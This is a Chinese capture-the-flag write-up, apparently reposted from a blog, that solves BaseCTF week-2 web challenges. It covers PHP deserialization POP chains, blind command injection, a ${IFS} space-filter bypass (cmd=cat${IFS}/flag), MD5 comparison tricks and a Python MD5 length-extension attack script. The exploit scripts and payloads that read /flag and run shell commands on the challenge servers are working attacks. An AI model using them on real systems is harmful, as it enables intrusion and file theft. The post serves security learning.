0


BaseCTF之web(week2)

ez_ser

  1. <?php
  2. highlight_file(__FILE__);
  3. error_reporting(0);
  4. class re{
  5. public $chu0;
  6. public function __toString(){
  7. if(!isset($this->chu0)){
  8. return "I can not believes!";
  9. }
  10. $this->chu0->$nononono;
  11. }
  12. }
  13. class web {
  14. public $kw;
  15. public $dt;
  16. public function __wakeup() {
  17. echo "lalalla".$this->kw;
  18. }
  19. public function __destruct() {
  20. echo "ALL Done!";
  21. }
  22. }
  23. class pwn {
  24. public $dusk;
  25. public $over;
  26. public function __get($name) {
  27. if($this->dusk != "gods"){
  28. echo "什么,你竟敢不认可?";
  29. }
  30. $this->over->getflag();
  31. }
  32. }
  33. class Misc {
  34. public $nothing;
  35. public $flag;
  36. public function getflag() {
  37. eval("system('cat /flag');");
  38. }
  39. }
  40. class Crypto {
  41. public function __wakeup() {
  42. echo "happy happy happy!";
  43. }
  44. public function getflag() {
  45. echo "you are over!";
  46. }
  47. }
  48. $ser = $_GET['ser'];
  49. unserialize($ser);
  50. ?>

考点:反序列化

为什么要先进行序列化?因为在程序执行完毕后,所创建对象的属性资源都会被销毁,而序列化是将对象的状态信息转换为可以存储或传输的形式的过程,其目的是为了实现对象的持久化、网络传输、跨平台存储和对象复制。

首先介绍几个魔术方法

  • ‌**__construct()**‌:当使用new关键字创建对象时被调用,用于初始化对象。
  • ‌**__destruct()**‌:当销毁对象(unset)或脚本执行结束时或反序列化时被调用,用于清理资源或执行必要的清理操作。
  • ‌**__sleep()**‌:在对象被序列化之前被调用,通常用于指定哪些属性需要被序列化。
  • ‌**__wakeup()**‌:在对象被反序列化之后立即被调用,用于初始化对象的状态或执行必要的初始化操作。
  • ‌**__call()**‌:当在对象上下文中调用不存在的方法时触发。
  • ‌**__callStatic()**‌:在静态上下文中调用不存在的方法时触发。
  • ‌**__isset()‌ 和 ‌__unset()**‌:在不可访问的属性上调用isset()empty()以及使用unset()时触发。
  • ‌**__get()‌ 和 ‌__set()**‌:分别用于获取和设置对象的属性值,当访问不存在的属性时触发。
  • ‌**__toString()**‌:当一个对象被当作字符串使用时调用。
  • ‌**__invoke()**‌:当脚本尝试将对象调用为函数时触发。

首先我们需要用脚本序列化一个对象:

  1. <?php
  2. class re{
  3. public $chu0;
  4. public function __toString(){
  5. if(!isset($this->chu0)){
  6. return "I can not believes!";
  7. }
  8. $this->chu0->$nononono;
  9. }
  10. }
  11. class web {
  12. public $kw;
  13. public $dt;
  14. public function __wakeup() {
  15. echo "lalalla".$this->kw;
  16. }
  17. }
  18. class pwn {
  19. public $dusk;
  20. public $over;
  21. public function __get($name) {
  22. if($this->dusk != "gods"){
  23. echo "什么,你竟敢不认可?";
  24. }
  25. $this->over->getflag();
  26. }
  27. }
  28. class Misc {
  29. public $nothing;
  30. public $flag;
  31. public function getflag() {
  32. eval("system('cat /flag');");
  33. }
  34. }
  35. $a=new web();
  36. $a->kw=new re();
  37. $a->kw->chu0=new pwn();
  38. $a->kw->chu0->dusk="gods";
  39. $a->kw->chu0->over=new Misc();
  40. echo urlencode(serialize($a));
  41. ?>

其中只有当pwn对象引用pwn私有属性或者未定义属性时,才会调用_get()方法;

只有当re对象被当作字符串执行时,才会调用_tostring()方法;

只有当序列化的web对象$a被反序列化时才会调用_wakeup()方法;

成功得到flag:

一起吃豆豆

玩游戏?是不可能的;

查看index.js发现了base64编码

里面有些注释是乱码的,不过可以去看游戏的源代码找

你听不到我的声音

  1. <?php
  2. highlight_file(__FILE__);
  3. shell_exec($_POST['cmd']);

这题提示就说了怎么看不到shell命令输出的结果?

本人也是先各种命令尝试:

ls不行

ls /不行

cat flag.php不行

cat flag不行

cat /flag不行

cp flag 1.txt不行

cp /flag 1.txt可以

当然这里也可以用重定向符号**>**写入到一个文件

比如:ls>1.txt

一般flag就藏在当前目录或者根目录下的flag文件或flag.php文件里面,多尝试几次就可能出来了

Really EZ POP

  1. <?php
  2. highlight_file(__FILE__);
  3. class Sink
  4. {
  5. private $cmd = 'echo 123;';
  6. public function __toString()
  7. {
  8. eval($this->cmd);
  9. }
  10. }
  11. class Shark
  12. {
  13. private $word = 'Hello, World!';
  14. public function __invoke()
  15. {
  16. echo 'Shark says:' . $this->word;
  17. }
  18. }
  19. class Sea
  20. {
  21. public $animal;
  22. public function __get($name)
  23. {
  24. $sea_ani = $this->animal;
  25. echo 'In a deep deep sea, there is a ' . $sea_ani();
  26. }
  27. }
  28. class Nature
  29. {
  30. public $sea;
  31. public function __destruct()
  32. {
  33. echo $this->sea->see;
  34. }
  35. }
  36. if ($_POST['nature']) {
  37. $nature = unserialize($_POST['nature']);
  38. }

这里的提示说反序列化不会忽略成员变量的可访问性;也就是我们在序列化的过程中不能修改变量的public/private属性

但是在高版本的php中,一般都可以忽略成员变量的可访问性,但这里提到了,所以肯定暗藏玄机

思路:

倒叙推到

1.这里面最后一步能得到flag的地方也就只有eval($this->cmd);所以我们要把cmd的属性值修改成我们想要执行的shell命令,直接将echo '123'改成'system("ls");'

2.下一个问题:我们得调用_tostring()方法,调用时机也就是Sink对象被当作字符串执行,发现这里echo 'Shark says:' . $this->word;将word当作字符串执行了,那么我们只需把word属性值修改成Sink的对象,但这里我们不能直接将变量值定义为另一个类的对象,我们可以自己写一个函数,然后在外面调用,参数就是new Sink();

3.那如何执行_ivoke()方法呢?上面我们写道该方法的调用时机是当脚本尝试将对象调用为函数时触发。我们很容易发现Sea类中_get()方法有函数被执行了,即将$sea_ani()函数执行,那我们可以将$sea_ani变量值修改成Shark的对象,那么我们调用函数的时候,就是把Shark当做函数调用了,因为$sea_ani的权限是public,所以我们在类外面就可以修改$sea_ani为new Shark();

4.接着该调用_get()方法,调用时机就是引用不存在的属性或者私有属性时,发现_destruct()方法调用了未定义的属性,那么就可以把see的属性值改成new Sea();

那如何调用_destruct()呢,**__destruct() 析构函数则在对象销毁和unserialize反序列化的情况下会被触发。**

这样我们就可以写脚本构造序列化了

  1. <?php
  2. class Sink
  3. {
  4. private $cmd = 'system("ls");';
  5. public function __toString()
  6. {
  7. eval($this->cmd);
  8. }
  9. }
  10. class Shark
  11. {
  12. private $word = 'Hello, World!';
  13. public function Setword($setword){
  14. $this->word =$setword;
  15. }
  16. public function __invoke()
  17. {
  18. echo 'Shark says:' . $this->word;
  19. }
  20. }
  21. class Sea
  22. {
  23. public $animal;
  24. public function __get($name)
  25. {
  26. $sea_ani = $this->animal;
  27. echo 'In a deep deep sea, there is a ' . $sea_ani();
  28. }
  29. }
  30. class Nature
  31. {
  32. public $sea;
  33. public function __destruct()
  34. {
  35. echo $this->sea->see;
  36. }
  37. }
  38. $a=new Nature();
  39. $a->sea=new Sea();
  40. $a->sea->animal=new Shark();
  41. $a->sea->animal->Setword(new Sink());
  42. echo urlencode(serialize($a));

hackbar执行ls命令时还可以输出,执行ls /命令是用hackbar会有错误,要用Bp或Yakit抓包

再执行cat /flag命令(用Bp提交)

成功拿到flag

RCEisamazingwithspace

  1. <?php
  2. highlight_file(__FILE__);
  3. $cmd = $_POST['cmd'];
  4. // check if space is present in the command
  5. // use of preg_match to check if space is present in the command
  6. if (preg_match('/\s/', $cmd)) {
  7. echo 'Space not allowed in command';
  8. exit;
  9. }

'\s'表示可以匹配任意一个空白字符,就比如说:换页符、换行符、回车和制表符等。

绕过空格有很多办法,但尝试了一下,只有${IFS}可以用;

payload:cmd=cat${IFS}/flag

所以你说你懂 MD5?

  1. <?php
  2. session_start();
  3. highlight_file(__FILE__);
  4. // 所以你说你懂 MD5 了?
  5. $apple = $_POST['apple'];
  6. $banana = $_POST['banana'];
  7. if (!($apple !== $banana && md5($apple) === md5($banana))) {
  8. die('加强难度就不会了?');
  9. }
  10. // 什么? 你绕过去了?
  11. // 加大剂量!
  12. // 我要让他成为 string
  13. $apple = (string)$_POST['appple'];
  14. $banana = (string)$_POST['bananana'];
  15. if (!((string)$apple !== (string)$banana && md5((string)$apple) == md5((string)$banana))) {
  16. die('难吗?不难!');
  17. }
  18. // 你还是绕过去了?
  19. // 哦哦哦, 我少了一个等于号
  20. $apple = (string)$_POST['apppple'];
  21. $banana = (string)$_POST['banananana'];
  22. if (!((string)$apple !== (string)$banana && md5((string)$apple) === md5((string)$banana))) {
  23. die('嘻嘻, 不会了? 没看直播回放?');
  24. }
  25. // 你以为这就结束了
  26. if (!isset($_SESSION['random'])) {
  27. $_SESSION['random'] = bin2hex(random_bytes(16)) . bin2hex(random_bytes(16)) . bin2hex(random_bytes(16));
  28. }
  29. // 你想看到 random 的值吗?
  30. // 你不是很懂 MD5 吗? 那我就告诉你他的 MD5 吧
  31. $random = $_SESSION['random'];
  32. echo md5($random);
  33. echo '<br />';
  34. $name = $_POST['name'] ?? 'user';
  35. // check if name ends with 'admin'
  36. if (substr($name, -5) !== 'admin') {
  37. die('不是管理员也来凑热闹?');
  38. }
  39. $md5 = $_POST['md5'];
  40. if (md5($random . $name) !== $md5) {
  41. die('伪造? NO NO NO!');
  42. }
  43. // 认输了, 看样子你真的很懂 MD5
  44. // 那 flag 就给你吧
  45. echo "看样子你真的很懂 MD5";
  46. echo file_get_contents('/flag'); 加强难度就不会了?

第一步绕过:强比较绕过的方法目前只有使用数组,md5对数组的返回值为null,通过这个特性可以绕过

第二步绕过:弱相等强制转换成字符串,只要字符串经过md5后是0e开头,那么两者就是相等的

第三步绕过:强相等,此时两个字符串的md5值必须完全一样

第四步绕过:这里用到了字符串的拓展攻击,通过脚本执行可以得到新的md5

  1. from struct import pack, unpack
  2. from math import floor, sin
  3. """
  4. MD5 Extension Attack
  5. ====================
  6. @refs
  7. https://github.com/shellfeel/hash-ext-attack
  8. """
  9. class MD5:
  10. def __init__(self):
  11. self.A, self.B, self.C, self.D = \
  12. (0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476) # initial values
  13. self.r: list[int] = \
  14. [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + \
  15. [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4 # shift values
  16. self.k: list[int] = \
  17. [floor(abs(sin(i + 1)) * pow(2, 32))
  18. for i in range(64)] # constants
  19. def _lrot(self, x: int, n: int) -> int:
  20. # left rotate
  21. return (x << n) | (x >> 32 - n)
  22. def update(self, chunk: bytes) -> None:
  23. # update the hash for a chunk of data (64 bytes)
  24. w = list(unpack('<'+'I'*16, chunk))
  25. a, b, c, d = self.A, self.B, self.C, self.D
  26. for i in range(64):
  27. if i < 16:
  28. f = (b & c) | ((~b) & d)
  29. flag = i
  30. elif i < 32:
  31. f = (b & d) | (c & (~d))
  32. flag = (5 * i + 1) % 16
  33. elif i < 48:
  34. f = (b ^ c ^ d)
  35. flag = (3 * i + 5) % 16
  36. else:
  37. f = c ^ (b | (~d))
  38. flag = (7 * i) % 16
  39. tmp = b + \
  40. self._lrot((a + f + self.k[i] + w[flag])
  41. & 0xffffffff, self.r[i])
  42. a, b, c, d = d, tmp & 0xffffffff, b, c
  43. self.A = (self.A + a) & 0xffffffff
  44. self.B = (self.B + b) & 0xffffffff
  45. self.C = (self.C + c) & 0xffffffff
  46. self.D = (self.D + d) & 0xffffffff
  47. def extend(self, msg: bytes) -> None:
  48. # extend the hash with a new message (padded)
  49. assert len(msg) % 64 == 0
  50. for i in range(0, len(msg), 64):
  51. self.update(msg[i:i + 64])
  52. def padding(self, msg: bytes) -> bytes:
  53. # pad the message
  54. length = pack('<Q', len(msg) * 8)
  55. msg += b'\x80'
  56. msg += b'\x00' * ((56 - len(msg)) % 64)
  57. msg += length
  58. return msg
  59. def digest(self) -> bytes:
  60. # return the hash
  61. return pack('<IIII', self.A, self.B, self.C, self.D)
  62. def verify_md5(test_string: bytes) -> None:
  63. # (DEBUG function) verify the MD5 implementation
  64. from hashlib import md5 as md5_hashlib
  65. def md5_manual(msg: bytes) -> bytes:
  66. md5 = MD5()
  67. md5.extend(md5.padding(msg))
  68. return md5.digest()
  69. manual_result = md5_manual(test_string).hex()
  70. hashlib_result = md5_hashlib(test_string).hexdigest()
  71. assert manual_result == hashlib_result, "Test failed!"
  72. def attack(message_len: int, known_hash: str,
  73. append_str: bytes) -> tuple:
  74. # MD5 extension attack
  75. md5 = MD5()
  76. previous_text = md5.padding(b"*" * message_len)
  77. current_text = previous_text + append_str
  78. md5.A, md5.B, md5.C, md5.D = unpack("<IIII", bytes.fromhex(known_hash))
  79. md5.extend(md5.padding(current_text)[len(previous_text):])
  80. return current_text[message_len:], md5.digest().hex()
  81. if __name__ == '__main__':
  82. message_len = int(input("[>] Input known text length: "))
  83. known_hash = input("[>] Input known hash: ").strip()
  84. append_text = input("[>] Input append text: ").strip().encode()
  85. print("[*] Attacking...")
  86. extend_str, final_hash = attack(message_len, known_hash, append_text)
  87. from urllib.parse import quote
  88. from base64 import b64encode
  89. print("[+] Extend text:", extend_str)
  90. print("[+] Extend text (URL encoded):", quote(extend_str))
  91. print("[+] Extend text (Base64):", b64encode(extend_str).decode())
  92. print("[+] Final hash:", final_hash)

利用random的hash值得到经过扩展的hash值

长度要写成96,这里提交的时候name变量的值要写成urlencoded后的值,而不是name

数学大师

显然我们不可能一个个手算,只能通过脚本来执行

  1. import requests
  2. import re
  3. Answer = 0
  4. regex = r" (\d*?)(.)(\d*)\?"
  5. req = requests.session()
  6. for i in range(55):
  7. a = req.post("http://challenge.basectf.fun:22333", data={"answer": Answer})
  8. match = re.search(regex, a.text)
  9. num1 = match.group(1)
  10. op = match.group(2)
  11. num2 = match.group(3)
  12. if op == "+":
  13. Answer = int(num1) + int(num2)
  14. elif op == "-":
  15. Answer = int(num1) - int(num2)
  16. elif op == "÷":
  17. Answer = int(num1) // int(num2)
  18. elif op == "×":
  19. Answer = int(num1) * int(num2)
  20. print(a.text)

标签: 前端

本文转载自: https://blog.csdn.net/qq_74350234/article/details/141757892
版权归原作者 pink鱼 所有, 如有侵权,请联系我们删除。

“BaseCTF之web(week2)”的评论:

还没有评论